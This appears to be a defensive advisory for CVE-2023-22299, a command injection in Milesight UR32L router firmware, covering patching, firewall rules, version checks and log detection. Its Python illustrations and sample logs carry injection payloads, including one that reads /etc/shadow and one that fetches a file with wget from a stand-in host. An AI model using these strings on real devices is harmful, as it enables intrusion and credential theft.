CVE-2023-22299
📋 TL;DR
This CVE describes an OS command injection vulnerability in the vtysh_ubus _get_fw_logs functionality of the Milesight UR32L router (firmware v32.3.0.5). A specially crafted network request carries shell syntax into a command the device executes, so an attacker who can reach the device can run arbitrary commands on it and potentially take full control. Organizations running UR32L routers on vulnerable firmware are at risk.
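The vulnerability class described above, as an added Python illustration that is not the UR32L firmware's own code: a "get firmware logs" handler that splices a request value into a shell string, beside a hardened version that allow-lists the value and passes it as a discrete argv element. The parameter name `section` and the `logread | grep` pipeline are assumptions standing in for whatever _get_fw_logs really runs.

```python
from __future__ import annotations
import re

# Added illustration of the vulnerability class, not the UR32L firmware's own
# code: `section` and the `logread | grep` pipeline are assumed placeholders.


def build_fw_log_command_vulnerable(section: str) -> str:
    """Vulnerable pattern: the request value is spliced into a shell string.

    Any shell syntax in `section` (; | & ` $( ) or a newline) is parsed by
    the shell as syntax, so "kernel; cat /etc/shadow" runs a second command.
    """
    return "logread | grep " + section


def shell_simple_commands(cmdline: str) -> list[str]:
    """Show what the shell would see: split the line at the separators a
    POSIX shell uses between simple commands. A rough splitter for the demo,
    not a full shell parser (quoting is ignored)."""
    return [part.strip() for part in re.split(r"[;&|\n]+", cmdline) if part.strip()]


# Allow-list for the value: a short token of letters, digits, '_', '.' and
# '-', nothing the shell could interpret. Reject rather than try to escape.
SECTION_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def build_fw_log_argv_hardened(section: str) -> list[str]:
    """Hardened pattern: validate against the allow-list, then hand the value
    to the program as one argv element with no shell in between
    (subprocess.run(argv, shell=False) in Python, execve() in C).

    Even without the allow-list an argv element is never shell-parsed; the
    allow-list is defence in depth. `--` stops grep from reading a leading
    '-' as an option.
    """
    if not SECTION_RE.fullmatch(section):
        raise ValueError(f"rejected log section {section!r}")
    return ["grep", "--", section]


def hardened_rejects(section: str) -> bool:
    """True if the allow-list refuses this value."""
    try:
        build_fw_log_argv_hardened(section)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "kernel; cat /etc/shadow"
    print(shell_simple_commands(build_fw_log_command_vulnerable(payload)))
    print(build_fw_log_argv_hardened("kernel"), hardened_rejects(payload))
```

The vulnerable builder returns a line the shell splits into three commands, the last of them the attacker's; the hardened builder refuses the same payload outright and, for a clean value, returns argv that can be executed without any shell.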
💻 Affected Systems
- Milesight UR32L running firmware v32.3.0.5 (the version this page lists as affected)
📦 What is this software?
UR32L firmware by Milesight. The UR32L is an industrial cellular router; vtysh_ubus is the component whose _get_fw_logs handler is affected.
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise allowing attacker to install persistent backdoors, pivot to internal networks, exfiltrate data, or use device as botnet node
Likely Case
Unauthorized command execution leading to device configuration changes, network disruption, or credential harvesting
If Mitigated
Limited impact if network segmentation, strict firewall rules, and access controls prevent exploitation attempts
🎯 Exploit Status
Exploitation requires network access to the interface that handles the firmware-log request; a single crafted request suffices and no user interaction is needed. Confirm in the vendor advisory whether an authenticated session is required before treating the device as exposed to unauthenticated attackers, and treat every account that can reach that interface as able to trigger it.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor for latest firmware
Vendor Advisory: https://www.milesight.com/support/security-advisory/
Restart Required: Yes
Instructions:
1. Check the current firmware version.
2. Download the latest firmware from the Milesight support portal.
3. Upload the firmware via the web interface.
4. Apply the update and restart the device.
5. After the restart, confirm the reported version is newer than v32.3.0.5.
🔧 Temporary Workarounds
Network Segmentation
Isolate UR32L devices from untrusted networks and restrict access to management interfaces to a dedicated management network.
Firewall Rules
Block external access to the vulnerable service port, allowing only the management subnet. Rule order matters: the ACCEPT rule must precede the DROP, and the bracketed placeholders must be replaced with the real port and subnet.
iptables -A INPUT -p tcp --dport [management_port] -s [management_subnet] -j ACCEPT
iptables -A INPUT -p tcp --dport [management_port] -j DROP
🧯 If You Can't Patch
- Implement strict network access controls to limit who can reach the device
- Monitor for unusual network traffic patterns or command execution attempts
🔍 How to Verify
Check if Vulnerable:
Read the firmware version from the web interface or over SSH: cat /etc/version
Firmware v32.3.0.5 is the version this page lists as affected.
Verify Fix Applied:
Confirm the reported firmware version is newer than v32.3.0.5, comparing the dotted components as numbers rather than as strings.
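A small version check for the verification step above, added here as example code rather than anything from the vendor. It assumes `cat /etc/version` or the web UI yields a dotted string such as "v32.3.0.5", and that builds not newer than the listed affected version should be treated as unpatched (the page does not state whether earlier builds are affected).

```python
from __future__ import annotations
import re

# Version this page lists as affected. Whether earlier builds are also affected
# is not stated on the page; this check assumes anything not newer than
# v32.3.0.5 should be treated as unpatched until the vendor says otherwise.
AFFECTED_VERSION = "v32.3.0.5"


def parse_version(text: str) -> tuple[int, ...]:
    """Pull the dotted numeric version out of `cat /etc/version` output or a
    web-UI string such as 'v32.3.0.5'; a leading 'v', trailing newline or
    surrounding text are tolerated."""
    m = re.search(r"\d+(?:\.\d+)+", text)
    if not m:
        raise ValueError(f"no dotted version found in {text!r}")
    return tuple(int(part) for part in m.group(0).split("."))


def is_fixed(running: str, affected: str = AFFECTED_VERSION) -> bool:
    """True when the running firmware is strictly newer than the affected one,
    comparing component by component as integers."""
    return parse_version(running) > parse_version(affected)


def naive_string_is_newer(running: str, affected: str = AFFECTED_VERSION) -> bool:
    """The comparison to avoid: lexicographic string order says
    '32.3.0.10' < '32.3.0.5' because '1' sorts before '5'."""
    return running.lstrip("v") > affected.lstrip("v")


if __name__ == "__main__":
    for v in ("v32.3.0.5\n", "v32.3.0.4", "v32.3.0.10"):
        print(v.strip(), "fixed" if is_fixed(v) else "NOT fixed",
              "(string compare says newer:", naive_string_is_newer(v.strip()), ")")
```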
📡 Detection & Monitoring
Log Indicators:
- Unusual command execution in system logs
- Multiple failed authentication attempts followed by successful access
Network Indicators:
- Unexpected outbound connections from UR32L
- Traffic to unusual ports from device
SIEM Query:
source="ur32l_logs" AND (command="*;*" OR command="*|*" OR command="*`*" OR command="*$(*" OR command="*%3B*" OR command="*%7C*" OR command="*%24%28*" OR command="*%0A*")
The field name is illustrative; map it to whatever field carries the request parameter in your log source. The encoded forms (%3B, %7C, %24%28, %0A) are included because a raw request field may carry the payload URL-encoded, and a newline is as effective a separator as a semicolon.
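The detection logic of the SIEM query above, run over constructed sample log lines as an added Python example (not UR32L's real log format, and not vendor code). The `/cgi?op=get_fw_logs` endpoint and `section` parameter are placeholders for whatever request reaches _get_fw_logs. The example also reproduces the raw, undecoded match the query performs, to show which encoded payloads it misses.

```python
from __future__ import annotations
from urllib.parse import unquote_plus

# Constructed sample lines (not UR32L's real log format): timestamp, client,
# method, request. The endpoint and `section` parameter are placeholders.
SAMPLE_LOG = """\
2023-07-06T10:00:01Z 192.0.2.10 POST /cgi?op=get_fw_logs&section=kernel
2023-07-06T10:00:05Z 192.0.2.10 POST /cgi?op=get_fw_logs&section=kernel;wget%20http://198.51.100.7/x%20-O%20/tmp/x
2023-07-06T10:00:09Z 192.0.2.10 POST /cgi?op=get_fw_logs&section=%24(id)
2023-07-06T10:00:12Z 192.0.2.55 POST /cgi?op=get_fw_logs&section=system
2023-07-06T10:00:15Z 192.0.2.10 POST /cgi?op=get_fw_logs&section=kernel%0Aid
"""

# What a shell treats as a command separator or substitution. '&' and the
# newline are included because the page's SIEM query does not cover them.
SHELL_META = (";", "|", "&", "`", "$(", "\n", "\r")
# Literal forms the page's query matches on the raw, undecoded field.
RAW_QUERY_META = (";", "|", "`", "$(")


def parse_query(query: str) -> dict[str, str]:
    """Split a query string on '&' and percent-decode each key and value.
    Done by hand so a ';' inside a value is never treated as a separator."""
    params: dict[str, str] = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def raw_siem_style_matches(log_text: str) -> list[str]:
    """Reproduce the page's SIEM query on the raw line: it fires only when a
    metacharacter appears literally, so percent-encoded payloads are missed."""
    return [ln for ln in log_text.splitlines() if any(m in ln for m in RAW_QUERY_META)]


def detect_injection_candidates(log_text: str) -> list[dict[str, str]]:
    """Decode each request parameter first, then look for shell syntax in it."""
    hits: list[dict[str, str]] = []
    for line in log_text.splitlines():
        fields = line.split(" ", 3)
        if len(fields) < 4:
            continue  # malformed line; skip rather than crash the sweep
        ts, client, _method, request = fields
        _path, _, query = request.partition("?")
        for name, value in parse_query(query).items():
            found = [m for m in SHELL_META if m in value]
            if found:
                hits.append({"time": ts, "client": client, "param": name,
                             "value": value, "matched": ",".join(repr(m) for m in found)})
    return hits


if __name__ == "__main__":
    print("raw query matches:", len(raw_siem_style_matches(SAMPLE_LOG)))
    for hit in detect_injection_candidates(SAMPLE_LOG):
        print(hit)
```

On the sample, the raw match catches only the literal `;` line, while decoding first also surfaces the `%24(id)` command substitution and the `%0A` newline separator. Decode before matching, and alert on `&` and newlines as well as the four characters in the original query.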